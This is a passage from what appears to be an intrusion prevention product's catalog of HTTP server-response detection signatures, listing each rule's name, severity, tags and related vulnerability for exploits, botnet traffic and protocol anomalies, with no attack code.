Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2004, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: Adobe-Acrobat-File-Extension-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Vulnerability: Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read
Description:
Back to top

HTTP_SHS-Apache-1.3-Mod_Proxy-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-507-5211
Vulnerability: Apache-1.3-Mod_Proxy-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Apache-HTTP-Server-Mod_Cache-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2013, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Apache-HTTP-Server-Mod_Cache-Denial-Of-Service
Description:
Back to top

HTTP_SHS-Apache-Subversion-SVN-SSH-Url-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Apache-Subversion-SVN-SSH-Url-Command-Execution
Description:
Back to top

HTTP_SHS-Apache-Tomcat-Default-Servlet-Open-Redirect

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Tomcat detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1116-5242
Vulnerability: Apache-Tomcat-Default-Servlet-Open-Redirect
Description:
Back to top

HTTP_SHS-Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Bad-Newline-Before-Transfer-Encoding

About this situation: Bad newline before the content encoding line
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-793-5211
Description:
Back to top

HTTP_SHS-Bad-Newline-In-Headers

About this situation: An incorrect newline in the HTTP headers
Context: HTTP Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-794-5211
Last changed: sgpkg-ips-939-5242
Description:
Back to top

HTTP_SHS-BD-Wow32-Banner

About this situation: Wow32 backdoor detected
Context: HTTP Server Header Stream
Severity: 10
Tags: Windows, Any Hardware, Wow23, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Backdoor-Wow23-03
Description:
Back to top

HTTP_SHS-BitTorrent-Over-Port-80

About this situation: BitTorrent usage detected on port 80
Context: HTTP Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-534-5211
Vulnerability: BitTorrent-Over-Port-80
Description:
Back to top

HTTP_SHS-Brotli-Encoded-Content-Without-Client-Acceptance

About this situation: Detected Brotli content-encoding without client support
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-795-5211
Description:
Back to top

HTTP_SHS-Brotli-In-Non-Standard-Port

About this situation: Detected Brotli content-encoding in a non-standard port
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-795-5211
Last changed: sgpkg-ips-795-5211
Description:
Back to top

HTTP_SHS-Campo-Downloader-Malware-Infection-Traffic

About this situation: Downloader malware infection traffic detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Campo-Downloader-Malware-Infection-Traffic
Description:
Back to top

HTTP_SHS-Chunked-HTTP-1.0-Response

About this situation: Chunked transfer encoding in an HTTP/1.0 response detected
Context: HTTP Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-1164-5242
Last changed: sgpkg-ips-1171-5242
Vulnerability: Chunked-HTTP-1.0-Response
Description:
Back to top

HTTP_SHS-Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Webex Teams detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Teams, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1280-5242
Vulnerability: Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
Description:
Back to top

HTTP_SHS-Citadel-Botnet-Traffic

About this situation: Citadel botnet traffic detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Vulnerability: Citadel-Botnet
Description:
Back to top

HTTP_SHS-Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-BOF

About this situation: An attempt to exploit a vulnerability in Citrix Systems Access Gateway Plug-in for Windows detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Systems Access Gateway Plug-in for Windows, CVE2011, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-528-5211
Vulnerability: Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-Buffer-Overflow
Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow
Description:
Back to top

HTTP_SHS-Clamav-Virusevent-Command-Injection

About this situation: An attempt to exploit a vulnerability in ClamAV
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Vulnerability: Clamav-Virusevent-Command-Injection
Description:
Back to top

HTTP_SHS-Connection-Upgrade-Reply

About this situation: Server acknowledged protocol switch
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SHS-Connection-Upgraded-To-HTTP2

About this situation: The server has upgraded the connection to use the HTTP/2 protocol
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Description:
Back to top

HTTP_SHS-Content-After-Zero-Content-Length

About this situation: Content was detected after zero content lenght was indicated
Context: HTTP Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Vulnerability: Content-After-Zero-Content-Length
Description:
Back to top

HTTP_SHS-Content-Encoding-Brotli

About this situation: Detected Brotli content-encoding from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-794-5211
Last changed: sgpkg-ips-794-5211
Description:
Back to top

HTTP_SHS-Content-Encoding-With-Obsolete-Header-Folding

About this situation: A HTTP server reply using obsolete Header Folding was seen
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Description:
Back to top

HTTP_SHS-Content-Encoding-X-Deflate

About this situation: Content encoding in server response is x-deflate
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-793-5211
Description:
Back to top

HTTP_SHS-Content-Type-Audio-Mpegurl

About this situation: Detected mpegurl content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-483-5211
Description:
Back to top

HTTP_SHS-Content-Type-Audio-Playlist

About this situation: Detected playlist content type from a HTTP server response
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-808-5242
Description:
Back to top

HTTP_SHS-Content-Type-Audio-Waveform

About this situation: Detected waveform audio content type from a HTTP server response
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-808-5242
Last changed: sgpkg-ips-991-5242
Description:
Back to top

HTTP_SHS-Content-Type-Cascading-Style-Sheet

About this situation: Detected Cascading Style Sheet from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-712-5211
Description:
Back to top

HTTP_SHS-Content-Type-Example

About this situation: Detected an example content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-483-5211
Description:
Back to top

HTTP_SHS-Content-Type-JAR

About this situation: Detected Java Archive content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-483-5211
Description:
Back to top

HTTP_SHS-Content-Type-Text-CSV

About this situation: Detected csv text content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Description:
Back to top

HTTP_SHS-Content-Type-Text-HTML

About this situation: Detected HTML text content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1532-5242
Description:
Back to top

HTTP_SHS-Content-Type-Text-Plain

About this situation: Detected plain text content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-483-5211
Description:
Back to top

HTTP_SHS-Content-Type-Unknown

About this situation: Detected an unknown content type from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-463-5211
Description:
Back to top

HTTP_SHS-Content-Type-UTF-16-Big-Endian

About this situation: Detected UTF-16 from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-351-4219
Last changed: sgpkg-ips-1618-5242
Description:
Back to top

HTTP_SHS-Content-Type-UTF-16-Little-Endian

About this situation: Detected UTF-16 from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-351-4219
Last changed: sgpkg-ips-1532-5242
Description:
Back to top

HTTP_SHS-Content-Type-UTF-32-Big-Endian

About this situation: Detected UTF-32 from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-351-4219
Last changed: sgpkg-ips-1532-5242
Description:
Back to top

HTTP_SHS-Content-Type-UTF-32-Little-Endian

About this situation: Detected UTF-32 from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-351-4219
Last changed: sgpkg-ips-1532-5242
Description:
Back to top

HTTP_SHS-Content-Type-UTF-7

About this situation: Detected UTF-7 from a HTTP server respose
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-351-4219
Last changed: sgpkg-ips-1532-5242
Description:
Back to top

HTTP_SHS-Core-Services-Memory-Corruption-CVE-2010-2561

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft XML Core Services detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-XML-Core-Services-Memory-Corruption-CVE-2010-2561
Description:
Back to top

HTTP_SHS-Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in cURL Project libcurl detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1867-5242
Vulnerability: Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution
Description:
Back to top

HTTP_SHS-Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in cURL Project cURL detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1171-5242
Vulnerability: Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Data-URI-In-Redirect

About this situation: Redirect to a data URI
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Data-URI-In-Redirect
Description:
Back to top

HTTP_SHS-Deflate-Gzip-With-Extra-Header

About this situation: Content-Encoding header followed with carriage return but no line feed detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: Content-Encoding-Empty-Missing-Linefeed
Description:
Back to top

HTTP_SHS-Double-CR-Before-Transfer-Encoding

About this situation: A HTTP server reply using invalid newline was seen
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Description:
Back to top

HTTP_SHS-EICAR-AntiVirus-Test-File

About this situation: The EICAR test file
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-724-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

HTTP_SHS-Electron-Setasdefaultprotocolclient-Command-Injection

About this situation: An attempt to exploit a vulnerability in Electronjs Electron detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Electronjs Electron, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Vulnerability: Electron-Setasdefaultprotocolclient-Command-Injection
Description:
Back to top

HTTP_SHS-Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Electronic Arts Origin detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Electronic Arts Origin, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
Description:
Back to top

HTTP_SHS-Encoding-Header-Whitespace-Before-Colon

About this situation: A HTTP reply encoding header has a whitespace before colon
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SHS-ESSP-Connection-Reply

About this situation: Server acknowledged an Extended Security Session Protocol (ESSP) connection
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SHS-Gnu-Wget-Cookie-Injection-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in GNU wget detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wget, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1068-5242
Vulnerability: Gnu-Wget-Cookie-Injection-Policy-Bypass
Description:
Back to top

HTTP_SHS-Host-Header-Localhost

About this situation: Detected localhost as host header
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Description:
Back to top

HTTP_SHS-HTTP-0.9-Response

About this situation: A HTTP version 0.9 response was detected
Context: HTTP Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Invalid-HTTP-Response
Description:
Back to top

HTTP_SHS-HTTP-Redirect-To-Non-HTTP-URI

About this situation: A HTTP redirection to a non-HTTP URI was detected
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-449-4219
Vulnerability: HTTP-Redirect-To-Non-HTTP-URI
Description:
Back to top

HTTP_SHS-Icecast-Not-Audio

About this situation: Non-audio IceCast
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-793-5211
Description:
Back to top

HTTP_SHS-Internet-Explorer-Content-Type-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Content-Type header handling vulnerability in Internet Explorer
Context: HTTP Reply Header Line
Severity: 2
Tags: Windows, x86, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Internet-Explorer-Content-Type-Buffer-Overflow
Description:
Back to top

HTTP_SHS-Internet-Explorer-File-Name-Spoofing

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: Internet-Explorer-File-Name-Spoofing
Description:
Back to top

HTTP_SHS-Invalid-Ascii-In-Content-Range-Header

About this situation: Detected a Content-Range header with invalid ascii value
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-726-5211
Description:
Back to top

HTTP_SHS-Invalid-Ascii-In-HTTP-Header

About this situation: Invalid character in HTTP header detected
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-852-5242
Description:
Back to top

HTTP_SHS-Invalid-Content-Encoding-Header

About this situation: Invalid content encoding header detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Description:
Back to top

HTTP_SHS-Invalid-CR-In-HTTP-Header

About this situation: Invalid carriage return in a HTTP header detected
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-865-5242
Description:
Back to top

HTTP_SHS-Invalid-Response-HTTP-1.0

About this situation: An invalid HTTP 1.0 response detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Invalid-HTTP-Response
Description:
Back to top

HTTP_SHS-Invalid-Response-HTTP-1.1

About this situation: An invalid HTTP 1.1 response detected
Context: HTTP Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-433-4219
Vulnerability: Invalid-HTTP-Response
Description:
Back to top

HTTP_SHS-Invalid-Server-Header-Ending

About this situation: Invalid character in HTTP header ending detected
Context: HTTP Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-842-5242
Description:
Back to top

HTTP_SHS-Invalid-Value-After-HTTP-Version

About this situation: A HTTP server reply using invalid request version value was seen
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Description:
Back to top

HTTP_SHS-Invalid-Whitespace-Before-Transfer-Encoding-Header

About this situation: A Tab or a Space before the Transfer-Encoding HTTP header detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1174-5242
Description:
Back to top

HTTP_SHS-Large-Content-Length-Value

About this situation: Detected a large value for the Content-Length header
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-673-5211
Vulnerability: Large-Content-Length-Value
Description:
Back to top

HTTP_SHS-Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Malwarebytes Anti-Malware detected
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Malwarebytes Anti-Malware, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
Description:
Back to top

HTTP_SHS-Microsoft-IIS-7.x-Server-Header

